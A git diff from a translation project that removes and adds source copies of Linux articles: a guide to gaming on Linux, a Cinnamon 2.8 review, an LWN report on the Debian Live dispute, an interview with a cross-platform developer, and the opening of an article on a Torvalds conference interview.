deleted file mode 100644
index 525d08838b..0000000000
--- a/sources/talk/20151019 Gaming On Linux--All You Need To Know.md
+++ /dev/null
@@ -1,205 +0,0 @@
-213edu Translating
-
-Gaming On Linux: All You Need To Know
-================================================================================
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/10/Gaming-on-Linux.jpeg)
-
-**Can I play games on Linux?**
-
-This is one of the most frequently asked questions by people who are thinking about [switching to Linux][1]. After all, gaming on Linux is often termed a distant possibility. In fact, some people even wonder if they can listen to music or watch movies on Linux. Considering that, questions about native Linux games seem genuine.
-
-In this article, I am going to answer most of the Linux gaming questions a Linux beginner may have. For example: is it possible to play games on Linux? If yes, what Linux games are available? Where can you **download Linux games** from, and how do you get more information about gaming on Linux?
-
-But before I do that, let me make a confession. I am not a PC gamer, or rather I should say, I am not a desktop Linux gamer. I prefer to play games on my PS4 and I don’t care about PC games or even mobile games (no Candy Crush requests sent to anyone in my friend list). This is the reason you see only a few articles in the [Linux games][2] section of It’s FOSS.
-
-So why am I covering this topic then?
-
-Because I have been asked questions about playing games on Linux several times and I wanted to come up with a Linux gaming guide that could answer all those questions. And remember, it’s not just gaming on Ubuntu I am talking about here. I am talking about Linux in general.
-
-### Can you play games on Linux? ###
-
-Yes and no!
-
-Yes, you can play games on Linux and no, you cannot play ‘all the games’ in Linux.
-
-Confused? Don’t be. What I meant here is that you can get plenty of popular games on Linux, such as [Counter Strike, Metro: Last Light][3] etc. But you might not get all the latest and most popular Windows games on Linux, e.g., [PES 2015][4].
-
-The reason, in my opinion, is that Linux has less than 2% of the desktop market share, and these numbers are demotivating enough for most game developers to avoid working on Linux versions of their games.
-
-Which means that there is a huge possibility that the most talked-about games of the year may not be playable on Linux. Don’t despair: there are ‘other means’ to get these games on Linux, and we shall see them in the coming sections. But before that, let’s talk about what kind of games are available for Linux.
-
-If I have to categorize, I’ll divide them into four categories:
-
-1. Native Linux Games
-1. Windows games in Linux
-1. Browser Games
-1. Terminal Games
-
-Let’s start with the most important one: native Linux games.
-
-----------
-
-### 1. Where to find native Linux games? ###
-
-Native Linux games are those games which are officially supported on Linux. These games have a native Linux client and can be installed like most other applications on Linux without requiring any additional effort (we’ll see about these in the next section).
-
-So, as you see, there are games developed for Linux. The next question is where you can find these Linux games and how you can play them. I am going to list some of the resources where you can get Linux games.
-
-#### Steam ####
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/09/Install-Steam-Ubuntu-11.jpeg)
-
-“[Steam][5] is a digital distribution platform for video games. As Amazon Kindle is a digital distribution platform for e-books and iTunes for music, so Steam is for games. It provides you the option to buy and install games, play multiplayer, and stay in touch with other gamers via social networking on its platform. The games are protected with [DRM][6].”
-
-A couple of years ago, when the gaming platform Steam announced support for Linux, it was big news. It was an indication that gaming on Linux was being taken seriously. Though Steam’s decision was more influenced by its own Linux-based gaming console and a separate [Linux distribution called SteamOS][7], it still was a reassuring move that has brought a number of games to Linux.
-
-I have written a detailed article about installing and using Steam. If you are getting started with Steam, do read it.
-
-- [Install and use Steam for gaming on Linux][8]
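-
-If you’d rather not read the full article right now, here is a minimal sketch of the usual Ubuntu route, assuming the steam package from Ubuntu’s multiverse component (package names and steps differ on other distributions):
-
-    # enable the multiverse component and refresh the package index
-    sudo add-apt-repository multiverse
-    sudo apt-get update
-    # install the Steam client
-    sudo apt-get install steam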
-
-#### GOG.com ####
-
-[GOG.com][9] is another platform similar to Steam. Like Steam, you can browse and find hundreds of native Linux games on GOG.com, purchase the games and install them. If the games support several platforms, you can download and use them across various operating systems. Your purchased games are available for you all the time in your account. You can download them anytime you wish.
-
-One main difference between the two is that GOG.com offers only DRM-free games and movies. Also, GOG.com is entirely web based, so you don’t need to install a client like Steam. You can simply download the games from your browser and install them on your system.
-
-#### Portable Linux Games ####
-
-[Portable Linux Games][10] is a website that hosts a collection of numerous Linux games. The unique and best thing about Portable Linux Games is that you can download and store the games for offline installation.
-
-The downloaded files have all the dependencies bundled (at times including Wine and a Perl runtime), and they are also platform independent. All you need to do is download the files and double-click to install them. Store the downloaded files on an external hard disk and use them in the future. Highly recommended if you don’t have continuous access to high-speed internet.
-
-#### Game Drift Game Store ####
-
-[Game Drift][11] is actually a Linux distribution based on Ubuntu with a sole focus on gaming. While you might not want to start using this Linux distribution for the sole purpose of gaming, you can always visit its online game store to see what games are available for Linux and install them.
-
-#### Linux Game Database ####
-
-As the name suggests, [Linux Game Database][12] is a website with a huge collection of Linux games. You can browse through various categories of games and download/install them from the game developers’ websites. As a member of Linux Game Database, you can even rate the games. LGDB, in a way, aims to be the IGN or IMDB of Linux games.
-
-#### Penguspy ####
-
-Created by a gamer who refused to use Windows for playing games, [Penguspy][13] showcases a collection of some of the best Linux games. You can browse games by category, and if you like a game, you’ll have to go to the respective game developer’s website to get it.
-
-#### Software Repositories ####
-
-Look into the software repositories of your own Linux distribution. There will always be some games in them. If you are using Ubuntu, the Ubuntu Software Center itself has an entire section for games. The same is true for other Linux distributions such as Linux Mint.
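-
-A quick way to survey what your distribution already packages is to search the repositories from the terminal. A sketch for Debian-based systems (other package managers have equivalent search commands):
-
-    # list packages whose name or description mentions "game"
-    apt-cache search game | less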
-
-----------
-
-### 2. How to play Windows games in Linux? ###
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/10/Wine-Linux.png)
-
-So far we have talked about native Linux games. But there are not that many of them; to be more precise, many of the most popular games are not available for Linux, though they are available for Windows PCs. So the question arises: how do you play Windows games on Linux?
-
-The good thing is that with the help of tools like Wine, PlayOnLinux and CrossOver, you can play a number of popular Windows games on Linux.
-
-#### Wine ####
-
-Wine is a compatibility layer which is capable of running Windows applications on systems like Linux, BSD and OS X. With the help of Wine, you can install and use a number of Windows applications on Linux.
-
-[Installing Wine in Ubuntu][14] or any other Linux is easy, as it is available in most Linux distributions’ repositories. There is a huge [database of applications and games supported by Wine][15] that you can browse.
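-
-As a minimal sketch on a Debian-based system (package names vary by distribution, and many games need extra configuration in Wine):
-
-    # install Wine from the distribution repositories
-    sudo apt-get install wine
-    # run a Windows executable through Wine (replace game.exe with your own file)
-    wine game.exe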
-
-#### CrossOver ####
-
-[CrossOver][16] is an improved version of Wine that brings professional and technical support to Wine. But unlike Wine, CrossOver is not free: you’ll have to purchase a yearly license for it. The good thing about CrossOver is that every purchase contributes to the Wine developers, which in fact boosts the development of Wine to support more Windows games and applications. If you can afford $48 a year, you should buy CrossOver for the support they provide.
-
-#### PlayOnLinux ####
-
-PlayOnLinux is also based on Wine but implemented differently. It has a different interface and is slightly easier to use than Wine. Like Wine, PlayOnLinux is free to use. You can browse the [applications and games supported by PlayOnLinux in its database][17].
-
-----------
-
-### 3. Browser Games ###
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2015/10/Chrome-Web-Store.jpeg)
-
-Needless to say, there are tons of browser-based games that you can play in any operating system, be it Windows, Linux, or Mac OS X. Most of the addictive mobile games, such as [GoodGame Empire][18], also have web browser counterparts.
-
-Apart from that, thanks to the [Google Chrome Web Store][19], you can play some more games on Linux. These Chrome games are installed like standalone apps and can be accessed from the application menu of your Linux OS. Some of these Chrome games are playable offline as well.
-
-----------
-
-### 4. Terminal Games ###
-
-![](http://itsfoss.itsfoss.netdna-cdn.com/wp-content/uploads/2014/03/nSnake_Linux_terminal_game.jpeg)
-
-An added advantage of using Linux is that you can use the command-line terminal to play games. I know that it’s not the best way to play games, but at times it’s fun to play games like [Snake][20] or [2048][21] in the terminal. There is a good collection of Linux terminal games at [this blog][22]. You can browse through it and play the ones you want.
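-
-Trying one takes a single install on most distributions. A sketch assuming Debian/Ubuntu packaging, where the bsdgames package bundles several classics and puts its binaries in /usr/games:
-
-    # install a collection of classic terminal games
-    sudo apt-get install bsdgames
-    # play the bundled snake game
-    /usr/games/snake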
-
-----------
-
-### How to stay updated about Linux games? ###
-
-Now that you have learned what kind of games are available on Linux and how you can use them, the next question is how to stay updated about new games on Linux. For that, I advise you to follow these blogs that cover the latest happenings of the Linux gaming world:
-
-- [Gaming on Linux][23]: I won’t be wrong if I call it the best Linux gaming news portal. You get all the latest rumblings and news about Linux games. Frequently updated, Gaming on Linux has a dedicated fan following, which makes it a nice community of Linux game lovers.
-- [Free Gamer][24]: A blog focusing on free and open source games.
-- [Linux Game News][25]: A Tumblr blog that posts updates on various Linux games.
-
-#### What else? ####
-
-I think that’s pretty much what you need to know to get started with gaming on Linux. If you are still not convinced, I would advise you to [dual boot Linux with Windows][26]. Use Linux as your main desktop, and if you want to play games, boot into Windows. This could be a reasonable compromise.
-
-It’s time for you to add your input. Do you play games on your Linux desktop? What are your favorites? What blogs do you follow to stay updated on the latest Linux games?
-
-
-Poll:
-How do you play games on Linux?
-
-- I use Wine and PlayOnLinux along with native Linux Games
-- I am happy with Browser Games
-- I prefer the Terminal Games
-- I use native Linux games only
-- I play it on Steam
-- I dual boot and go into Windows to play games
-- I don't play games at all
-
-Note: poll embed code
-
-
-
-
-
-Note: decide how to handle the poll at publication time.
-
---------------------------------------------------------------------------------
-
-via: http://itsfoss.com/linux-gaming-guide/
-
-作者:[Abhishek][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://itsfoss.com/author/abhishek/
-[1]:http://itsfoss.com/reasons-switch-linux-windows-xp/
-[2]:http://itsfoss.com/category/games/
-[3]:http://blog.counter-strike.net/
-[4]:https://pes.konami.com/tag/pes-2015/
-[5]:http://store.steampowered.com/
-[6]:https://en.wikipedia.org/wiki/Digital_rights_management
-[7]:http://itsfoss.com/valve-annouces-linux-based-gaming-operating-system-steamos/
-[8]:http://itsfoss.com/install-steam-ubuntu-linux/
-[9]:http://www.gog.com/
-[10]:http://www.portablelinuxgames.org/
-[11]:http://gamedrift.org/GameStore.html
-[12]:http://www.lgdb.org/
-[13]:http://www.penguspy.com/
-[14]:http://itsfoss.com/wine-1-5-11-released-ppa-available-to-download/
-[15]:https://appdb.winehq.org/
-[16]:https://www.codeweavers.com/products/
-[17]:https://www.playonlinux.com/en/supported_apps.html
-[18]:http://empire.goodgamestudios.com/
-[19]:https://chrome.google.com/webstore/category/apps
-[20]:http://itsfoss.com/nsnake-play-classic-snake-game-linux-terminal/
-[21]:http://itsfoss.com/play-2048-linux-terminal/
-[22]:https://ttygames.wordpress.com/
-[23]:https://www.gamingonlinux.com/
-[24]:http://freegamer.blogspot.fr/
-[25]:http://linuxgamenews.com/
-[26]:http://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/
diff --git a/sources/talk/20151117 How bad a boss is Linus Torvalds.md b/sources/talk/20151117 How bad a boss is Linus Torvalds.md
index 8b10e44584..7ebba90483 100644
--- a/sources/talk/20151117 How bad a boss is Linus Torvalds.md
+++ b/sources/talk/20151117 How bad a boss is Linus Torvalds.md
@@ -1,3 +1,4 @@
+sonofelice translating
How bad a boss is Linus Torvalds?
================================================================================
![linus torvalds](http://images.techhive.com/images/article/2015/08/linus_torvalds-100600260-primary.idge.jpg)
@@ -74,4 +75,4 @@ via: http://www.computerworld.com/article/3004387/it-management/how-bad-a-boss-i
[1]:http://www.computerworld.com/article/2874475/linus-torvalds-diversity-gaffe-brings-out-the-best-and-worst-of-the-open-source-world.html
[2]:http://www.zdnet.com/article/linux-4-3-released-after-linus-torvalds-scraps-brain-damage-code/
[3]:http://lkml.iu.edu/hypermail/linux/kernel/1510.3/02866.html
-[4]:http://sarah.thesharps.us/2015/10/05/closing-a-door/
\ No newline at end of file
+[4]:http://sarah.thesharps.us/2015/10/05/closing-a-door/
diff --git a/sources/talk/20151201 Cinnamon 2.8 Review.md b/sources/talk/20151201 Cinnamon 2.8 Review.md
deleted file mode 100644
index 0529cf80ec..0000000000
--- a/sources/talk/20151201 Cinnamon 2.8 Review.md
+++ /dev/null
@@ -1,89 +0,0 @@
-translating by wwy-hust
-
-Cinnamon 2.8 Review
-================================================================================
-![](https://www.maketecheasier.com/assets/uploads/2015/11/cinnamon-2-8-featured.jpg)
-
-Other than Gnome and KDE, Cinnamon is another desktop environment that is used by many people. It is made by the same team that produces Linux Mint (and ships with Linux Mint) and can also be installed on several other distributions. The latest version of this DE – Cinnamon 2.8 – was released earlier this month, and it brings a host of bug fixes and improvements as well as some new features.
-
-I’m going to go over the major improvements made in this release as well as how to update to Cinnamon 2.8 or install it for the first time.
-
-### Improvements to Applets ###
-
-There are several improvements to already existing applets for the panel.
-
-#### Sound Applet ####
-
-![cinnamon-28-sound-applet](https://www.maketecheasier.com/assets/uploads/2015/11/rsz_cinnamon-28-sound-applet.jpg)
-
-The Sound applet was revamped and now displays track information as well as the media controls on top of the cover art of the audio file. For music players with seeking support (such as Banshee), a progress bar will be displayed in the same region which you can use to change the position of the audio track. Right-clicking on the applet in the panel will display the options to mute input and output devices.
-
-#### Power Applet ####
-
-The Power applet now displays the status of each of the connected batteries and devices using the manufacturer’s data instead of generic names.
-
-#### Window Thumbnails ####
-
-![cinnamon-2.8-window-thumbnails](https://www.maketecheasier.com/assets/uploads/2015/11/cinnamon-2.8-window-thumbnails.png)
-
-Cinnamon 2.8 brings the option to show window thumbnails when hovering over the window list in the panel. You can turn it off if you don’t like it, though.
-
-#### Workspace Switcher Applet ####
-
-![cinnamon-2.8-workspace-switcher](https://www.maketecheasier.com/assets/uploads/2015/11/cinnamon-2.8-workspace-switcher.png)
-
-Adding the Workspace switcher applet to your panel will show you a visual representation of your workspaces with little rectangles embedded inside to show the position of your windows.
-
-#### System Tray ####
-
-Cinnamon 2.8 brings support for app indicators in the system tray. You can easily disable this in the settings which will force affected apps to fall back to using status icons instead.
-
-### Visual Improvements ###
-
-A host of visual improvements were made in Cinnamon 2.8. The classic and preview Alt + Tab switchers were polished with noticeable improvements, while the Alt + F2 dialog received bug fixes and better auto completion for commands.
-
-Also, the issue with the traditional animation effect for minimizing windows is now sorted and works with multiple panels.
-
-### Nemo Improvements ###
-
-![cinnamon-2.8-nemo](https://www.maketecheasier.com/assets/uploads/2015/11/rsz_cinnamon-28-nemo.jpg)
-
-The default file manager for Cinnamon also received several bug fixes and has a new “Quick-rename” feature for renaming files and directories. This works by clicking the file or directory twice, with a short pause in between, to rename it.
-
-Nemo also detects issues with thumbnails automatically and prompts you to quickly fix them.
-
-### Other Notable improvements ###
-
-- Applets now reload themselves automatically once they are updated.
-- Support for multiple monitors was improved significantly.
-- Dialog windows have been improved and now attach themselves to their parent windows.
-- HiDPI detection has been improved.
-- QT5 applications now look more native and use the default GTK theme.
-- Window management and rendering performance has been improved.
-- There are various bugfixes.
-
-### How to Get Cinnamon 2.8 ###
-
-If you’re running Linux Mint you will get Cinnamon 2.8 as part of the upgrade to Linux Mint 17.3 “Rosa” Cinnamon Edition. The BETA release is already out, so you can grab that if you’d like to get your hands on the new software immediately.
-
-For Arch users, Cinnamon 2.8 is already in the official Arch repositories, so you can just update your packages and do a system-wide upgrade to get the latest version.
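-
-On Arch, that full upgrade is a single command (a sketch; as usual on a rolling release, check the Arch news before upgrading):
-
-    # refresh the package databases and upgrade all installed packages
-    sudo pacman -Syu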
-
-Finally, for Ubuntu users, you can install or upgrade to Cinnamon 2.8 by running the following commands in turn:
-
- sudo add-apt-repository -y ppa:moorkai/cinnamon
- sudo apt-get update
- sudo apt-get install cinnamon
-
-Have you tried Cinnamon 2.8? What do you think of it?
-
---------------------------------------------------------------------------------
-
-via: https://www.maketecheasier.com/cinnamon-2-8-review/
-
-作者:[Ayo Isaiah][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.maketecheasier.com/author/ayoisaiah/
diff --git a/sources/talk/20151227 Upheaval in the Debian Live project.md b/sources/talk/20151227 Upheaval in the Debian Live project.md
deleted file mode 100644
index d663d09b17..0000000000
--- a/sources/talk/20151227 Upheaval in the Debian Live project.md
+++ /dev/null
@@ -1,66 +0,0 @@
-While the event had a certain amount of drama surrounding it, the [announcement][1] of the end for the [Debian Live project][2] seems likely to have less of an impact than it first appeared. The loss of the lead developer will certainly be felt—and the treatment he and the project received seems rather baffling—but the project looks like it will continue in some form. So Debian will still have tools to create live CDs and other media going forward, but what appears to be a long-simmering dispute between project founder and leader Daniel Baumann and the Debian CD and installer teams has been "resolved", albeit in an unfortunate fashion.
-
-The November 9 announcement from Baumann was titled "An abrupt End to Debian Live". In that message, he pointed to a number of different events over the nearly ten years since the [project was founded][3] that indicated to him that his efforts on Debian Live were not being valued, at least by some. The final straw, it seems, was an "intent to package" (ITP) bug [filed][4] by Iain R. Learmonth that impinged on the namespace used by Debian Live.
-
-Given that one of the main Debian Live packages is called "live-build", the new package's name, "live-build-ng", was fairly confrontational in and of itself. Live-build-ng is meant to be a wrapper around the [vmdebootstrap][5] tool for creating live media (CDs and USB sticks), which is precisely the role Debian Live is filling. But when Baumann [asked][6] Learmonth to choose a different name for his package, he got an "interesting" [reply][7]:
-
-```
-It is worth noting that live-build is not a Debian project, it is an external project that claims to be an official Debian project. This is something that needs to be fixed.
-There is no namespace issue, we are building on the existing live-config and live-boot packages that are maintained and bringing these into Debian as native projects. If necessary, these will be forks, but I'm hoping that won't have to happen and that we can integrate these packages into Debian and continue development in a collaborative manner.
-live-build has been deprecated by debian-cd, and live-build-ng is replacing it. In a purely Debian context at least, live-build is deprecated. live-build-ng is being developed in collaboration with debian-cd and D-I [Debian Installer].
-```
-
-Whether or not Debian Live is an "official" Debian project (or even what "official" means in this context) has been disputed in the thread. Beyond that, though, Neil Williams (who is the maintainer of vmdebootstrap) [provided some][8] explanation for the switch away from Debian Live:
-
-```
-vmdebootstrap is being extended explicitly to provide support for a replacement for live-build. This work is happening within the debian-cd team to be able to solve the existing problems with live-build. These problems include reliability issues, lack of multiple architecture support and lack of UEFI support. vmdebootstrap has all of these, we do use support from live-boot and live-config as these are out of the scope for vmdebootstrap.
-```
-
-Those seem like legitimate complaints, but ones that could have been fixed within the existing project. Instead, though, something of a stealth project was evidently undertaken to replace live-build. As Baumann [pointed out][9], nothing was posted to the debian-live mailing list about the plans. The ITP was the first notice that anyone from the Debian Live project got about the plans, so it all looks like a "secret plan"—something that doesn't sit well in a project like Debian.
-
-As might be guessed, there were multiple postings that supported Baumann's request to rename "live-build-ng", followed by many that expressed dismay at his decision to stop working on Debian Live. But Learmonth and Williams were adamant that replacing live-build is needed. Learmonth did [rename][10] live-build-ng to a perhaps less confrontational name: live-wrapper. He noted that his aim had been to add the new tool to the Debian Live project (and "bring the Debian Live project into Debian"), but things did not play out that way.
-
-```
-I apologise to everyone that has been upset by the ITP bug. The software is not yet ready for use as a full replacement for live-build, and it was filed to let people know that the work was ongoing and to collect feedback. This sort of worked, but the feedback wasn't the kind I was looking for.
-```
-
-The backlash could perhaps have been foreseen. Communication is a key aspect of free-software communities, so a plan to replace the guts of a project seems likely to be controversial—more so if it is kept under wraps. For his part, Baumann has certainly not been perfect—he delayed the "wheezy" release by [uploading an unsuitable syslinux package][11] and [dropped down][12] from a Debian Developer to a Debian Maintainer shortly thereafter—but that doesn't mean he deserves this kind of treatment. There are others involved in the project as well, of course, so it is not just Baumann who is affected.
-
-One of those other people is Ben Armstrong, who has been something of a diplomat during the event and has tried to smooth the waters. He started with a [post][13] that celebrated the project and what Baumann and the team had accomplished over the years. As he noted, the [list of downstream projects][14] for Debian Live is quite impressive. In another post, he also [pointed out][15] that the project is not dead:
-
-```
-If the Debian CD team succeeds in their efforts and produces a replacement that is viable, reliable, well-tested, and a suitable candidate to replace live-build, this can only be good for Debian. If they are doing their job, they will not "[replace live-build with] an officially improved, unreliable, little-tested alternative". I've seen no evidence so far that they operate that way. And in the meantime, live-build remains in the archive -- there is no hurry to remove it, so long as it remains in good shape, and there is not yet an improved successor to replace it.
-```
-
-On November 24, Armstrong also [posted][16] an update (and to [his blog][17]) on Debian Live. It shows some good progress made in the two weeks since Baumann's exit; there are even signs of collaboration between the project and the live-wrapper developers. There is also a [to-do list][18], as well as the inevitable call for more help. That gives reason to believe that all of the drama surrounding the project was just a glitch—avoidable, perhaps, but not quite as dire as it might have seemed.
-
-
----------------------------------
-
-via: https://lwn.net/Articles/665839/
-
-作者:Jake Edge
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-
-[1]: https://lwn.net/Articles/666127/
-[2]: http://live.debian.net/
-[3]: https://www.debian.org/News/weekly/2006/08/
-[4]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=804315
-[5]: http://liw.fi/vmdebootstrap/
-[6]: https://lwn.net/Articles/666173/
-[7]: https://lwn.net/Articles/666176/
-[8]: https://lwn.net/Articles/666181/
-[9]: https://lwn.net/Articles/666208/
-[10]: https://lwn.net/Articles/666321/
-[11]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=699808
-[12]: https://nm.debian.org/public/process/14450
-[13]: https://lwn.net/Articles/666336/
-[14]: http://live.debian.net/project/downstream/
-[15]: https://lwn.net/Articles/666338/
-[16]: https://lwn.net/Articles/666340/
-[17]: http://syn.theti.ca/2015/11/24/debian-live-after-debian-live/
-[18]: https://wiki.debian.org/DebianLive/TODO
diff --git a/sources/talk/20160505 Confessions of a cross-platform developer.md b/sources/talk/20160505 Confessions of a cross-platform developer.md
new file mode 100644
index 0000000000..0f6af84070
--- /dev/null
+++ b/sources/talk/20160505 Confessions of a cross-platform developer.md
@@ -0,0 +1,76 @@
+vim-kakali translating
+
+
+
+Confessions of a cross-platform developer
+=============================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/business_clouds.png?itok=cucHuJnU)
+
+[Andreia Gaita][1] is giving a talk at this year's OSCON, titled [Confessions of a cross-platform developer][2]. She's a long-time open source and [Mono][3] contributor, and develops primarily in C#/C++. Andreia works at GitHub, where she's focused on building the GitHub Extension manager for Visual Studio.
+
+I caught up with Andreia ahead of her talk to ask about cross-platform development and what she's learned in her 16 years as a cross-platform developer.
+
+![](https://opensource.com/sites/default/files/images/life/Interview%20banner%20Q%26A.png)
+
+**What languages have you found easiest and hardest to develop cross-platform code for?**
+
+It's less about which languages are good and more about the libraries and tooling available for those languages. The compilers/interpreters/build systems available for languages determine how easy it is to do cross-platform work with them (or whether it's even possible), and the libraries available for UI and native system access determine how deep you can integrate with the OS. With that in mind, I found C# to be the best for cross-platform work. The language itself includes features that allow fast native calls and accurate memory mapping, which you really need if you want your code to talk to the OS and native libraries. When I need very specific OS integration, I switch to C or C++.
+
+**What cross-platform toolkits/abstractions have you used?**
+
+Most of my cross-platform work has been developing tools, libraries and bindings for other people to develop cross-platform applications with, mostly in Mono/C# and C/C++. I don't get to use a lot of abstractions at that level, beyond glib and friends. I mostly rely on Mono for any cross-platform app that includes a UI, and Unity3D for the occasional game development. I play with Electron every now and then.
+
+**What has been your approach to build systems, and how does this vary by language or platform?**
+
+I try to pick the build system that is most suited for the language(s) I'm using. That way, it'll (hopefully) give me less headaches. It needs to allow for platform and architecture selection, be smart about build artifact locations (for multiple parallel builds), and be decently configurable. Most of the time I have projects combining C/C++ and C# and I want to build all the different configurations at the same time from the same source tree (Debug, Release, Windows, OSX, Linux, Android, iOS, etc, etc.), and that usually requires selecting and invoking different compilers with different flags per output build artifact. So the build system has to let me do all of this without getting (too much) in my way. I try out different build systems every now and then, just to see what's new, but in the end, I end up going back to makefiles and a combination of either shell and batch scripts or Perl scripts for driving them (because if I want users to build my things, I'd better pick a command line script language that is available everywhere).
+
+**How do you balance the desire for native look and feel with the need for uniform user interfaces?**
+
+Cross-platform UI is hard! I've implemented several cross-platform GUIs over the years, and it's the one thing for which I don't think there's an optimal solution. There's basically two options. You can pick a cross-platform GUI toolkit and do a UI that doesn't feel quite right in all the platforms you support, with a small codebase and low maintenance cost. Or you can choose to develop platform-specific UIs that will look and feel native and well integrated with a larger codebase and higher maintenance cost. The decision really depends on the type of app, how many features it has, how many resources you have, and how many platforms you're shipping to.
+
+In the end, I think there's an increase in users' tolerance for "One UI To Rule Them All" with frameworks like Electron. I have a Chromium+C+C# framework side project that will one day hopefully allow me to build Electron-style apps in C#, giving me the best of both worlds.
+
+**Has building/packaging dependencies been an issue for you?**
+
+I'm very conservative about my use of dependencies, having been bitten so many times by breaking ABIs, clashing symbols, and missing packages. I decide which OS version(s) I'm targeting and pick the lowest common denominator release available of a dependency to minimize issues. That usually means having five different copies of Xcode and OSX Framework libraries, five different versions of Visual Studio installed side by side on the same machine, multiple clang and gcc versions, and a bunch of VMs running various other distros. If I'm unsure of the state of packages in the OS I'm targeting, I will sometimes link statically and sometimes submodule dependencies to make sure they're always available. And most of all, I avoid the bleeding edge unless I really, really need something there.
+
+**Do you use continuous integration, code review, and related tools?**
+
+All the time! It's the only way to keep sane. The first thing I do on a project is set up cross-platform build scripts to ensure everything is automatable as early as possible. When you're targeting multiple platforms, CI is essential. It's impossible for everyone to build all the different combinations of platforms on one machine, and as soon as you're not building all of them you're going to break something without being aware of it. In a shared multi-platform codebase, different people own different platforms and features, so the only way to guarantee quality is to have cross-team code reviews combined with CI and other analysis tools. It's no different from other software projects; there are just more points of failure.
+
+**Do you rely on automated build testing, or do you tend to build on each platform and test locally?**
+
+For tools and libraries that don't include UIs, I can usually get away with automated build testing. If there's a UI, then I need to do both—reliable, scriptable UI automation for existing GUI toolkits is rare to non-existent, so I would have to either invest in creating UI automation tools that work across all the platforms I want to support, or I do it manually. If a project uses a custom UI toolkit (like, say, an OpenGL UI like Unity3D does), then it's fairly easy to develop scriptable automation tools and automate most of that stuff. Still, there's nothing like the human ability to break things with a couple of clicks!
+
+**If you are developing cross-platform, do you support cross-editor build systems so that you can use Visual Studio on Windows, Qt Creator on Linux, and XCode on Mac? Or do you tend toward supporting one platform such as Eclipse on all platforms?**
+
+I favor cross-editor build systems. I prefer generating project files for different IDEs (preferably in a way that makes it easier to add more IDEs), with build scripts that can drive builds from the IDEs for the platform they're on. Editors are the most important tool for a developer. It takes time and effort to learn them, and they're not interchangeable. I have my favorite editors and tools, and everyone else should be able to use their favorite tool, too.
+
+**What is your preferred editor/development environment/IDE for cross-platform development?**
+
+The cross-platform developer is cursed with having to pick the lowest common denominator editor that works across the most platforms. I love Visual Studio, but I can't rely on it for anything except Windows work (and you really don't want to make Windows your primary cross-compiling platform), so I can't make it my primary IDE. Even if I could, an essential skill of cross-platform development is to know and use as many platforms as possible. That means really knowing them—using the platform's editors and libraries, getting to know the OS and its assumptions, behaviors, and limitations, etc. To do that and keep my sanity (and my shortcut muscle memory), I have to rely on cross-platform editors. So, I use Emacs and Sublime.
+
+**What are some of your favorite past and current cross-platform projects?**
+
+Mono is my all-time favorite, hands down, and most of the others revolve around it in some way. Gluezilla was a Mozilla binding I did years ago to allow C# apps to embed web browser views, and that one was a doozy. At one point I had a Winforms app, built on Linux, running on Windows with an embedded GTK view in it that was running a Mozilla browser view. The CppSharp project (formerly Cxxi, formerly CppInterop) is a project I started to generate C# bindings for C++ libraries so that you could call, create instances of, and subclass C++ classes from C#. It was done in such a way that it would detect at runtime what platform you'd be running on and what compiler was used to create the native library and generate the correct C# bindings for it. That was fun!
+
+**Where do you see cross-platform development heading in the future?**
+
+The way we build native applications is already changing, and I feel like the visual differences between the various desktop operating systems are going to become even more blurred so that it will become easier to build cross-platform apps that integrate reasonably well without being fully native. Unfortunately, that might mean applications will be worse in terms of accessibility and less innovative when it comes to using the OS to its full potential. Cross-platform development of tools, libraries, and runtimes is something that we know how to do well, but there's still a lot of work to do with cross-platform application development.
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/5/oscon-interview-andreia-gaita
+
+作者:[Marcus D. Hanwell][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/mhanwell
+[1]: https://twitter.com/sh4na
+[2]: http://conferences.oreilly.com/oscon/open-source-us/public/schedule/detail/48702
+[3]: http://www.mono-project.com/
diff --git a/sources/talk/20160506 Linus Torvalds Talks IoT Smart Devices Security Concerns and More.md b/sources/talk/20160506 Linus Torvalds Talks IoT Smart Devices Security Concerns and More.md
new file mode 100644
index 0000000000..e17c33bd81
--- /dev/null
+++ b/sources/talk/20160506 Linus Torvalds Talks IoT Smart Devices Security Concerns and More.md
@@ -0,0 +1,46 @@
+Linus Torvalds Talks IoT, Smart Devices, Security Concerns, and More [video]
+===========================================================================
+
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elc-linus-b.jpg?itok=6WwnCSjL)
+>Dirk Hohndel interviews Linus Torvalds at ELC.
+
+For the first time in the 11-year history of the [Embedded Linux Conference (ELC)][0], held in San Diego, April 4-6, the keynotes included a discussion with Linus Torvalds. The creator and lead overseer of the Linux kernel, and “the reason we are all here,” in the words of his interviewer, Intel Chief Linux and Open Source Technologist Dirk Hohndel, seemed upbeat about the state of Linux in embedded and Internet of Things applications. Torvalds’ very presence signaled that embedded Linux, which has often been overshadowed by Linux desktop, server, and cloud technologies, had come of age.
+
+![](https://www.linux.com/sites/lcom/files/styles/floated_images/public/elc-linus_0.jpg?itok=FNPIDe8k)
+>Linus Torvalds speaking at Embedded Linux Conference.
+
+IoT was the main topic at ELC, which included an OpenIoT Summit track, and the chief topic in the Torvalds interview.
+
